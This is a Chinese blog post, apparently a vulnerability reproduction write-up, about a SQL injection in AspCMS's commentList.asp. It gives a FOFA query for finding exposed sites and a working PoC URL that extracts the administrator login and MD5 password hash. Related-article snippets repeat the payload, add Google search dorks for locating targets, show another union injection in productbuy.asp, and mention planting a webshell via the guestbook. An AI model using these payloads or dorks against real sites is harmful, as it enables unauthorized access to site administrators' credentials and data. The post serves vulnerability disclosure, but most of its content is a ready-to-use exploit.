AspCMS系统commentList.asp存在SQL注入

原创 已于 2025-05-16 14:20:15 修改 · 211 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库 #安全威胁分析 #web安全 #漏洞复现 #漏洞库

于 2025-05-16 11:30:48 首次发布

问题描述

AspCMS commentList.asp 存在SQL注入,攻击者可以获取管理员md5的密码,进行解密后登录获取敏感数据。

技术细节

AspCMS的commentList.asp文件存在SQL注入,攻击者可通过构造恶意请求,获取管理员账户的MD5加密密码。获取密码后,攻击者可进行解密并登录系统,进一步访问敏感数据。该问题的利用方式涉及在URL中插入特定的SQL语句,从而绕过系统安全机制,直接查询数据库中的用户信息。建议及时修复该问题,防止数据泄露。

fofa

app="ASPCMS"

poc

/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user
Sword-heart
关注
漏洞复现AspCMS commentList.asp SQL注入
失心少年
09-14 2279
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码,进行解密后登录获取敏感数据。1.利用如下POC可获取管理员MD5的密码。
漏洞复现】I Doc View在线文档预览任意文件读取 1day
失心少年
12-14 836
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!I Doc View在线文档预览是一款在线文档预览系统,可以实现文档的预览及文档协作编辑功能。其存在代码执行漏洞,使得攻击者可以通过利用这个接口,触发服务器下载并解析恶意文件,从而导致远程命令执行漏洞
SQL注入:对cms管理系统进行SQL注入,分别使用手工注入和自动化注入两种方法,获取管理员的账号密码。
2401_83124412的博客
06-29 809
进行字符转码:cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users。id=33 and 1=1 /and 1=2判断。3.爆破字段,猜测数据在cms_users表里面,查看字段,有id,username,password三个字段。回显报错信息,因为联合查询,每列的数据类型不同而报错,将 table_name。传参id=33’,报错’’’,可初步判定存在数字型注入点,进一步验证。
dedecms aspcms_tempfun.php,ASPCMSSQL注入及修复(AspCms_ContentFun.asp)
weixin_34651547的博客
03-19 149
'die debugmodedim action : action=getForm("action","get")dim ContentID, LanguageID, SortID, GroupID, Exclusive, Title, Title2, TitleColor, IsOutLink, OutLink, Author, ContentSource, ContentTag, Conten...
注入id列表_开源CMS实战渗透测试ASPCMS注入
weixin_39926613的博客
11-27 1106
实验等级:中级任务场景:【任务场景】小王在对ASPCMS进行代码审计时,发现ASPCMS的API存在较大的安全问题。在查阅资料后,发现该CMS的逻辑漏洞会导致SQL语句执行漏洞。任务分析:【任务分析】通过阅读源码,找到commentList.asp中的逻辑漏洞。使用处理过的SQL语句执行获取管理员信息,并对其密码进行MD5解密,最终实现盗取管理员账号密码的效果。预备知识:【预备知识】A...
AspCMS commentList.asp SQL注入漏洞.md
04-08
AspCMS commentList.asp SQL注入漏洞.md
漏洞复现AspCMS commentList.asp SQL注入漏洞
失心少年
07-28 466
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码。
ASP源码—牛牛ASPCMS中小企业网站管理系统.zip
10-23
实际解压后,会包含HTML页面、ASP脚本文件、图片、CSS、JavaScript、数据库连接文件(如conn.asp或config.asp)以及可能的数据库文件(如Access的mdb文件或SQL Server的mdf文件)等。 为了部署和运行这个系统,你...
精选资源
CSZ CMS 1.2.X sql注入漏洞
09-07
CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。 ## 二、漏洞影响 CSZ CMS ...
批量注入ASPCMS获得管理后台权限
08-25
批量注入ASPCMS获得管理后台权限,很好的东西
漏洞 立即留言_ASPCMS留言板漏洞注入一句话木马插入数据库及修复方法
weixin_39931923的博客
12-19 1486
aspcms主要是信息发布系统,影响版本为asp漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入数据库数据库默认配置为asp.目录在/data/data.asp下。利用方法,保证默认数据库路径末更改及可留言,就算不能留言,可构造,经测试,基本上末更改aspcms主要是信息发布系统,影响版本为asp漏洞成因,在留言板处对信息处理不当,导致代码注入。可直接将一句话木马插入...
学习MySQL这一篇就够了
热门推荐
轻松的小希
11-25 21万+
第一章 数据库概述 1.1、数据库的好处 将数据持久化到本地 提供结构化查询功能 1.2、数据库的常见概念 DB:数据库,存储数据的仓库 DBS:数据库管理系统,又称为数据库软件或者数据库产品,用于创建和管理DB,常见的有MySQL、Oracle、DB2、SQL Server SQL:结构化查询语言,用于和数据库通信的语言,不是某个数据库软件特有的,而是几乎所有的主流数据库软件通用的语言 1.3、数据库的存储特点 数据存放到表中,然后表再放到库中 一个库中可以有多张表,每张表具有唯一的表名用来标识
ASPCMS
最新发布
m0_63944205的博客
08-03 557
ASPCMS是由上⾕⽹络开发的全新内核的开源企业建站系统,能够胜任企业多种建站需求,并且 ⽀持模版⾃定义、⽀持扩展插件等等,能够在短时间内完成 企业建站。
墨者CMS系统漏洞分析溯源(第4题)题解
zr1213159840的博客
01-28 1247
打开给的链接的页面,能发现是aspcms,还给了一个登录框 通过搜索发现,aspcms存在一个注入漏洞,拿到登录名和密码 http://219.153.49.228:45597//plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 对密码进行一
WEBaspcms漏洞利用
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
ASP中的SQL注入
flynetcn的专栏
02-02 1958
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入SQL注入是从正常的WWW端口访问,
0day漏洞aspcms漏洞实战
weixin_49071539的博客
12-16 3793
1. 谷歌搜索关键字 Powered by aspcms.com Copyright ?2010-2011 intitle:Powered by AspCms2 2. 接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user 3.
aspcms 程序漏洞 注入+ cookies欺骗
weixin_30483013的博客
03-26 561
漏洞出现在 /plug/productbuy.asp 对接收的参数id没有进行过滤而导致的注入漏洞 注入后的页面有跳转,所以要快,建议用快捷键复制 爆用户名 /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,2...
Asp.Net通用SQL注入源码解决方案
根据命名习惯推测,该文件可能属于一个名为DotBBS的论坛系统或内容管理系统(CMS)中的SQL注入防护模块。其中“StopSQLIn”可以理解为“阻止SQL注入”的缩写,意味着该文件中可能包含了输入验证、过滤非法字符、日志...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值